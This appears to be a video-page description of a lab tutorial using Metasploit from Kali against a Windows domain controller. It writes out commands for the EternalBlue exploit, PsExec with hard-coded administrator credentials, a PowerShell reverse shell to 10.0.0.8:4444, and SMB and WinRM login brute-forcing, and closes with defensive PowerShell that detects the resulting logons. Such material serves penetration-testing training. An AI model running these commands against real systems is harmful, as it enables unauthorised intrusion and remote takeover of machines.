Скачать или смотреть How to execute a payload using Metasploit in kali 2025.3 against Windows dc 2025

1.
sudo apt install metasploit-framework -y
➡️ Installs the Metasploit Framework on a Linux system (Debian/Ubuntu/Kali). The -y automatically confirms the installation.

2.
msfconsole --version
➡️ Displays the installed Metasploit version and exits.

3.
msfconsole
➡️ Starts the interactive Metasploit console.

4.
search phish_windows_credentials
➡️ Searches for modules in Metasploit related to phishing Windows credentials.

5.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.6
set LHOST 10.0.0.8
set LPORT 4444
exploit
➡️ Loads the EternalBlue SMB exploit (MS17-010) targeting 10.0.0.6. If successful, it creates a reverse shell back to 10.0.0.8:4444.

6.
search type:auxiliary scanner
➡️ Lists all auxiliary scanner modules in Metasploit (for host discovery, service detection, etc.).

7.
use auxiliary/scanner/smb/smb_login
➡️ Loads the SMB login scanner, used to brute force or test username/password combinations against SMB services.

8.
use exploit/windows/smb/psexec
➡️ Loads the PsExec exploit module, which lets you execute commands on a remote Windows system using valid SMB credentials.

9.
use exploit/windows/smb/psexec_psh
set RHOSTS 10.0.0.6
set SMBUser administrator
set SMBPass P@ssword2
set PAYLOAD windows/powershell_reverse_tcp
set LHOST 10.0.0.8
set LPORT 4444
exploit
➡️ Loads the PsExec PowerShell module. With valid SMB credentials (administrator / P@ssword2), it executes a PowerShell payload that connects back to 10.0.0.8:4444.

10.
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.0.0.6
set USERNAME administrator
set PASSWORD P@ssword2
run
➡️ Uses the WinRM login scanner to attempt authentication against 10.0.0.6 with the given credentials.

11.
sessions -l
➡️ Lists all active sessions (reverse shells, meterpreter sessions, etc.) currently open in Metasploit.

12.
sessions -i 1
➡️ Interacts with session #1, giving control of that active shell/meterpreter session.

13. (PowerShell)
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} |
Select-Object -First 300 -Property TimeCreated,
@{Name='Account';Expression={$_.Properties[5].Value}},
@{Name='LogonType';Expression={$_.Properties[8].Value}},
@{Name='SourceIP';Expression={$_.Properties[18].Value}}

➡️ Retrieves the last 300 successful logon events (4624) from the Windows Security log and displays:
Timestamp
Account
Logon type
Source IP

14. (PowerShell script)
$SourceIP = "10.0.0.8"

Search last 300 successful logon events (4624)
$events = Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select-Object -First 300

foreach ($event in $events) {
$Account = $event.Properties[5].Value
$LogonType = $event.Properties[8].Value
$Source = $event.Properties[18].Value

if ($Source -eq $SourceIP -and $Account -eq "Administrator") {
Write-Host "⚠️ Administrative logon detected"
Write-Host "Account: $Account"
Write-Host "LogonType: $LogonType"
Write-Host "Source IP: $Source"
Write-Host "Time: $($event.TimeCreated)"
Write-Host "---------------------------------------"
}
}

➡️ Filters the last 300 successful logons (4624) and alerts if the Administrator account logged in specifically from IP 10.0.0.8.